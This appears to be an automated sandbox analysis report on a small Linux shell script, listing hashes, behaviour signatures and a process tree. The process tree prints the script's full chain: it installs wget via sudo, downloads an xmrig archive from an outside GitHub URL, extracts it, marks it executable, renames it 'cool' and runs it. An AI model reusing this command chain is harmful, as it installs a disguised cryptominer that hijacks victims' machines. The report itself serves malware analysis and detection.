Analysis
max time kernel: 89s
max time network: 91s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 30-10-2024 07:15
Static task: static1
Behavioral tasks (sample runnb.sh in every task):
behavioral1  resource: ubuntu2204-amd64-20240611-en
behavioral2  resource: debian12-armhf-20240221-en
behavioral3  resource: debian12-mipsel-20240221-en
behavioral4  resource: debian9-armhf-20240611-en
behavioral5  resource: debian9-mipsbe-20240611-en
behavioral6  resource: debian9-mipsel-20240611-en
behavioral7  resource: ubuntu2004-amd64-20240611-en
behavioral8  resource: ubuntu2204-amd64-20240611-en
behavioral9  resource: ubuntu2404-amd64-20240523-en
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification  1 TTPs  1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
  PID   Process
  778   chmod
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Reads CPU attributes  1 TTPs  2 IoCs
Processes:
  Process   Description               IoC
  exim4     File opened for reading   /sys/devices/system/cpu/online
  exim4     File opened for reading   /sys/devices/system/cpu/online
Reads runtime system information
Processes:
  Process    Description               IoC
  tar        File opened for reading   /proc/filesystems
  mv         File opened for reading   /proc/filesystems
  sudo       File opened for reading   /proc/self/fd
  sendmail   File opened for reading   /proc/sys/kernel/ngroups_max
  sendmail   File opened for reading   /proc/sys/kernel/ngroups_max
  dpkg       File opened for reading   /proc/filesystems
  sudo       File opened for reading   /proc/filesystems
  sudo       File opened for reading   /proc/self/stat
  dpkg       File opened for reading   /proc/filesystems
  apt        File opened for reading   /proc/self/fd
  sudo       File opened for reading   /proc/sys/kernel/ngroups_max
  apt        File opened for reading   /proc/self/fd
  dpkg       File opened for reading   /proc/filesystems
  dpkg       File opened for reading   /proc/filesystems
Writes file to tmp directory  8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
  Process   Description                    IoC
  apt       File opened for modification   /tmp/fileutl.message.WzI2V4
  apt       File opened for modification   /tmp/fileutl.message.AvkAud
  apt       File opened for modification   /tmp/fileutl.message.ilkOfp
  apt       File opened for modification   /tmp/fileutl.message.zVpOt6
  apt       File opened for modification   /tmp/fileutl.message.9nRvSD
  apt       File opened for modification   /tmp/fileutl.message.9dqMwE
  apt       File opened for modification   /tmp/fileutl.message.WcR0vO
  apt       File opened for modification   /tmp/fileutl.message.zlCY61
Processes (process tree; each entry gives path, command line and PID, with matched signatures listed beneath it)
/tmp/runnb.sh: /tmp/runnb.sh  (PID 712)
  /usr/bin/sudo: sudo apt install wget  (PID 716)
    - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
    - Reads runtime system information
    /usr/sbin/sendmail: sendmail -t  (PID 730)
      - Reads runtime system information
      /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t621U-0000Bm-28  (PID 749)
        - Reads CPU attributes
    /usr/sbin/sendmail: sendmail -t  (PID 736)
      - Reads runtime system information
      /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t621U-0000Bs-1a  (PID 750)
        - Reads CPU attributes
    /usr/bin/apt: apt install wget  (PID 740)
      - Reads runtime system information
      - Writes file to tmp directory
      /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures  (PID 747)
        - Reads runtime system information
      /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures  (PID 757)
        - Reads runtime system information
  /usr/bin/apt: apt install wget  (PID 773)
    - Reads runtime system information
    - Writes file to tmp directory
    /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures  (PID 774)
      - Reads runtime system information
    /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures  (PID 775)
      - Reads runtime system information
  /usr/bin/wget: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz  (PID 776)
  /bin/tar: tar xvf xmrigtar.tar.gz  (PID 777)
    - Reads runtime system information
  /bin/chmod: chmod +x xmrig  (PID 778)
    - File and Directory Permissions Modification
  /bin/mv: mv xmrig cool  (PID 779)
    - Reads runtime system information
  /tmp/cool: ./cool  (PID 780)
Network
MITRE ATT&CK Enterprise v15
Downloads